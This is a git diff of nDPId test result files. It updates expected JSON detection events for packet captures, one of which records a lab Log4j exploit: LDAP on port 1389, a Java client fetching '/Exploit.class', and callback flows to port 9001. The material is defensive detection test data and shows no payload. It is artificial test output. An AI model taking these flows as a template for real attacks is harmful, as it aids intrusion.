+00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hjinD15132liFoBJxIDRmAAACBAW0BAIICinhDWbyKVxpAQMDBw=="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADRNd0AAQAa5FawQ7gqsEO4L4Y4FbXfaWIUpw9eegBAA5TReAAABAQgK8ilcainhDWY="} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
+00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834639,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834639,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzOBEAAQAY4gKwQ7gqsEO4LvZYAUJNLn5gAAAAAoAJyEDRmAAACBAW0BAIICvIpXHQAAAAAAQMDBw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9lr\/2uzmTS5+ZoBJxIDRmAAACBAW0BAIICinhDXHyKVx0AQMDBw=="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADTOBUAAQAY4h6wQ7gqsEO4LvZYAUJNLn5m\/9rs6gBAA5TReAAABAQgK8ilcdSnhDXE="} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} +01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834645,"flow_last_seen":1639425834645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834645,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639425834645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834645,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNUUAAQAY\/J6wQ7goKCgof2MojKQYXlfcAAAAAoAJyEK5yAAACBAW0BAIICq5YS5wAAAAAAQMDBw=="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639425834646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1639425834646,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAACgAAEAAQAaMjAoKCh+sEO4KIynYygAAAAAGF5X4UBQAAGmJAAA="} +00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00942{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":354,"flow_first_seen":1639425815944,"flow_last_seen":1639425833586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":861,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 
+00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","packets-captured":426,"packets-processed":422,"total-skipped-flows":0,"total-l4-data-len":5830,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1639425834697} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 426/422 diff --git a/test/results/long_tls_certificate.pcap.out b/test/results/long_tls_certificate.pcap.out index e3de4817e..ba9c3bfaa 100644 --- a/test/results/long_tls_certificate.pcap.out +++ b/test/results/long_tls_certificate.pcap.out 
@@ -1,13 +1,13 @@ 00471{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"long_tls_certificate.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1609756181300} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1609756181300,"flow_last_seen":1609756181300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1609756181300,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609756181300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqknAqAE8ag9ke9glAbsIXeEZAAAAALAC\/\/9qjwAAAgQFtAEDAwUBAQgKDpRqEwAAAAAEAgAA"} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609756181671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181671,"pkt":"KDc3AG3IEBMx8Tl2CABFAABAAABAACsGv0lqD2R7wKgBPAG72CWlbC1xCF3hGrASMqDiugAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609756181671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609756181671,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGqmHAqAE8ag9ke9glAbsIXeEapWwtclAQ\/\/+JLgAA"} 
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609756181300,"flow_last_seen":1609756181681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1609756181681,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-05065{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7375,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","server_names":"*.aliyun.com,manager.channel.aliyun.com,*.ace.aliyun.com,*.acs-internal.aliyuncs.com,*.acs.aliyun.com,*.aicrowd.aliyun.com,*.alibabacloud.co.in,*.alibabacloud.com,*.alibabacloud.com.au,*.alibabacloud.com.hk,*.alibabacloud.com.my,*.alibabacloud.com.sg,*.alibabacloud.com.tw,*.alicdn.com,*.alicloud.com,*.aligroup.aliyun.com,*.alimei.com,*.alink.aliyun.com,*.alios.aliyuncs.com,*.aliplus.com,*.alitranx.aliyun.com,*.aliyun-iot-share.com,*.aliyuncs.com,*.alyms.cn,*.ap-northeast-1.aliyuncs.com,*.ap-south-1.aliyuncs.com,*.ap-southeast-1.aliyuncs.com,*.ap-southeast-2.aliyuncs.com,*.ap-southeast-3.aliyuncs.com,*.ap-southeast-5.aliyuncs.com,*.api.aliyun.com,*.apm.aliyun.com,*.app.aliyun.com,*.asmlink.cn,*.banma.aliyuncs.com,*.base.shuju.aliyun.com,*.bi.aliyun.com,*.biz.aliyun.com,*.bridge.aliyun.com,*.ccc.aliyuncs.com,*.center.aliyun.com,*.citybrain.aliyun.com,*.cloudapp.aliyun.com,*.cloudeagle.cn,*.cloudgame.aliyun.com,*.cn-beijing.aliyuncs.com,*.cn-chengdu.aliyuncs.com,*.cn-guizhou.aliyuncs.com,*.cn-haidian.aliyuncs.com,*.cn-hangzhou-finance.aliyuncs.com,*.cn-hangzhou.aliyuncs.com,*.cn-hongkong.aliyuncs.com,*.cn-huhehaote.aliyuncs.com,*.cn-ningxia.aliyuncs.com,*.cn-north-2-gov-1.aliyuncs.com,*.cn-qingdao-nebula.aliy
uncs.com,*.cn-qingdao.aliyuncs.com,*.cn-shanghai-finance-1.aliyuncs.com,*.cn-shanghai.aliyun.com,*.cn-shanghai.aliyuncs.com,*.cn-shenzhen-cloudstone.aliyuncs.com,*.cn-shenzhen-finance-1.aliyuncs.com,*.cn-shenzhen.aliyuncs.com,*.cn-sichuan.aliyuncs.com,*.cn-zhangjiakou.aliyuncs.com,*.connect.aliyun.com,*.console.alibabacloud.com,*.console.alicloud.com,*.console.aliyun.com,*.cs.aliyun.com,*.cschat-ccs.aliyun.com,*.data.aliyun.com,*.dataapi.aliyun.com,*.dataq.aliyuncs.com,*.datav.aliyun.com,*.datav.aliyuncs.com,*.devlops.aliyun.com,*.devops.aliyun.com,*.ditu.aliyun.com,*.domain.aliyun.com,*.dyiot.aliyun.com,*.ebs.aliyun.com,*.emas.aliyun.com,*.emr.aliyun.com,*.enterprise.aliyun.com,*.env.aliyun.com,*.et-industry.aliyun.com,*.eu-central-1.aliyuncs.com,*.eu-west-1.aliyuncs.com,*.fc.aliyun.com,*.feedback.console.aliyun.com,*.gts-x.aliyun.com,*.gts.aliyun.com,*.help-ccs.aliyun.com,*.ialicdn.com,*.in-mumbai.aliyuncs.com,*.iot.aliyun.com,*.jp-fudao.aliyuncs.com,*.linkedmall.aliyun.com,*.linkwan.aliyun.com,*.living.aliyun.com,*.luban.aliyun.com,*.m.aliyun.com,*.market.aliyun.com,*.maxcompute.aliyun.com,*.me-east-1.aliyuncs.com,*.media.aliyun.com,*.microdingtalk.aliyun.com,*.mit.aliyun.com,*.mobile.aliyun.com,*.msea.aliyun.com,*.mts.aliyun.com,*.mvp.aliyun.com,*.nebula.aliyun.com,*.nls.aliyuncs.com,*.odps.aliyun.com,*.ons.aliyun.com,*.ose.aliyun.com,*.pai.data.aliyun.com,*.pcs-gw-cn-beijing.aliyun.com,*.pcs-gw-cn-shanghai.aliyun.com,*.phpwind.com,*.phpwind.net,*.pre-sg-purchase.aliyun.com,*.prepub.aliyun.com,*.product.center.aliyun.com,*.pts.aliyun.com,*.r-app-cn-beijing-data.aliyun.com,*.r-app-cn-hangzhou-data.aliyun.com,*.r-app-cn-shenzhen-data.aliyun.com,*.r-app-data.aliyun.com,*.rdc.aliyun.com,*.rds.aliyun.com,*.reid.aliyun.com,*.sc-cmdb.aliyuncs.com,*.scsp.aliyun.com,*.sg.aliyuncs.com,*.shuju.aliyun.com,*.smart.aliyun.com,*.soc.aliyun.com,*.soc.aliyuncs.com,*.sparenode.com,*.supet.com,*.tburl.in,*.teambition.com,*.teambition.net,*.teambitionapis.com,*.tianchi.aliyun.com,*
.toolkit.aliyun.com,*.tv.aliyun.com,*.tw-gaoxiong.aliyuncs.com,*.us-east-1.aliyuncs.com,*.us-west-1.aliyuncs.com,*.webide.aliyun.com,*.yuntu.aliyun.com,account.www.net.cn,alibabacloud.co.in,alibabacloud.com,alibabacloud.com.au,alibabacloud.com.hk,alibabacloud.com.my,alibabacloud.com.sg,alibabacloud.com.tw,alicdn.com,alicloud.com,alimei.com,aliyun-iot-share.com,aliyuncs.com,dc.www.net.cn,dmp.www.net.cn,dns.www.net.cn,panda.www.net.cn,pandavip.www.net.cn,phpwind.com,phpwind.net,scdnphi6.com,sparenode.com,supet.com,tburl.in,teambition.com,teambition.net,teambitionapis.com,tianchi-global.com,whois.www.net.cn,aliyun.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2","subjectDN":"C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.aliyun.com","alpn":"h2,http\/1.1","fingerprint":"2B:C6:82:22:E9:94:09:24:34:E1:5C:F1:24:76:98:75:45:78:53:DA"}} -00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1609756181300,"flow_last_seen":1609756183162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12100,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1609756183162,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"}} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1609756181300,"flow_last_seen":1609756181300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1609756181300,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 